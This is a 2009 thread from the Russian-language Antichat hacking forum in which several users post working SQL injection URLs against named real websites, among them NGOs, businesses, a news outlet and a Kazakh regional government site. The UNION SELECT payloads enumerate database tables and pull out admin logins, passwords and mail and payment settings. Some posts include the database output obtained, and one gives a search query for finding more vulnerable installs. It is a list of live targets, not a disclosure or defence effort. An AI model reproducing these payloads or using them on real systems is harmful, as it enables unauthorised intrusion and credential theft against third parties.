ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10871  
Старый 08.10.2009, 16:19
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--

5.0.27:internationorg_all:cmr@localhost

-------
Tables

http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+from+INFORM ATION_SCHEMA.TABLES--

-------------------------
http://www.webc-budapest.com/content/news_id.php?lang=en&id=-92+union+select+1,2,3,version(),5--

user() - lh288200@localhost
version() - 4.0.27
database() - lh288200db

Последний раз редактировалось SeNaP; 08.10.2009 в 16:32..
 
Ответить с цитированием

  #10872  
Старый 08.10.2009, 16:33
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Код:
http://eupodo.de/category.php?IndustryID=169+union+select+1,2,concat_ws(0x3a,loginid,password)+from+admin--
5.0.32-Debian_7etch8-log
eupodosql
eupodosql1@localhost
http://eupodo.de/category.php?IndustryID=169+union+select+1,2,user% 28%29+from+admin--
 
Ответить с цитированием

  #10873  
Старый 08.10.2009, 18:15
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203

Репутация: 704
Отправить сообщение для InDuStRieS с помощью ICQ
По умолчанию

Код:
http://www.ccrl.ca/print.php?id=-5061+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 
Ответить с цитированием

  #10874  
Старый 08.10.2009, 18:20
toross
Banned
Регистрация: 11.12.2008
Сообщений: 37
Провел на форуме:
178592

Репутация: 35
Отправить сообщение для toross с помощью ICQ
По умолчанию

Найден уязвимый движок сайт (CMS)

Находиться по запросу в гугле:
Цитата:
category.php?IndustryID=
Найденный мною сайт:

Цитата:
http://worldb2b.org/category.php?IndustryID=-14+union+select+1,2,concat_ws(0x3a,LoginID,Passwor d,AdminEmail,AdminEmailPassword,smtp,ScriptName,ur l,smtpstatus,port,Title,nochex,twoco,paypal,goldme mberfee)+from+admin--

Последний раз редактировалось jokester; 08.10.2009 в 18:23.. Причина: правила почитай
 
Ответить с цитированием

  #10875  
Старый 08.10.2009, 18:39
toross
Banned
Регистрация: 11.12.2008
Сообщений: 37
Провел на форуме:
178592

Репутация: 35
Отправить сообщение для toross с помощью ICQ
По умолчанию

Цитата:
http://justclone.com/alibabaclone/category.php?IndustryID=-31+union+select+1,2,group_concat(column_name)+from +information_schema.columns+where+table_name=0x616 46d696e--
Дальше разберетесь думаю
 
Ответить с цитированием

  #10876  
Старый 08.10.2009, 19:15
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

-------------------
Код:
http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
--
version() - 5.0.51A
user() - VOGUE_FASHION@LOCALHOST
database() - VOGUE_FASHION
--
Таблицы

Код:
http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,TABLE_NAME,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES--
-------------------
Код:
http://vesti.az/category.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
--
version() - 5.0.81-community
user() - vestiaz@localhost
database() - vestiaz_novost
--
 
Ответить с цитированием

  #10877  
Старый 08.10.2009, 21:18
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

5.0.32-Debian_7etch3~bpo31+1-log
http://www.taiwanb2b.com/category.php?IndustryID=34+union+select+1,2,concat _ws%280x3a,loginid,password%29+from+admin--
 
Ответить с цитированием

  #10878  
Старый 09.10.2009, 07:31
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.steinbeis-europa.de/index.php5?id=-409+unIon+seleCt+1,concat_ws(0x3a,user(),version() ,database())+--+&file=192
User: root@www.steinbeis-europa.de
Version: 5.0.32-Debian_7etch8-log
Database: sez
 
Ответить с цитированием

  #10879  
Старый 09.10.2009, 09:46
toross
Banned
Регистрация: 11.12.2008
Сообщений: 37
Провел на форуме:
178592

Репутация: 35
Отправить сообщение для toross с помощью ICQ
По умолчанию

4.1.22 log
Цитата:
http://www.freemp3.org.ua/news.php?id=-139+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15--
 
Ответить с цитированием

  #10880  
Старый 09.10.2009, 10:28
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

Pavlodar.gov.kz pr4 тИЦ=200
Аппарат акима Павлодарской области
Код:
http://www.pavlodar.gov.kz/page.php?page_id=1000+and+substring(version(),1,1)=5
version: 5.1.22-rc-log
user: db_pavlo@localhost


ps/ родной город великого webkill'a?)

Последний раз редактировалось Dyxxx; 09.10.2009 в 12:45..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ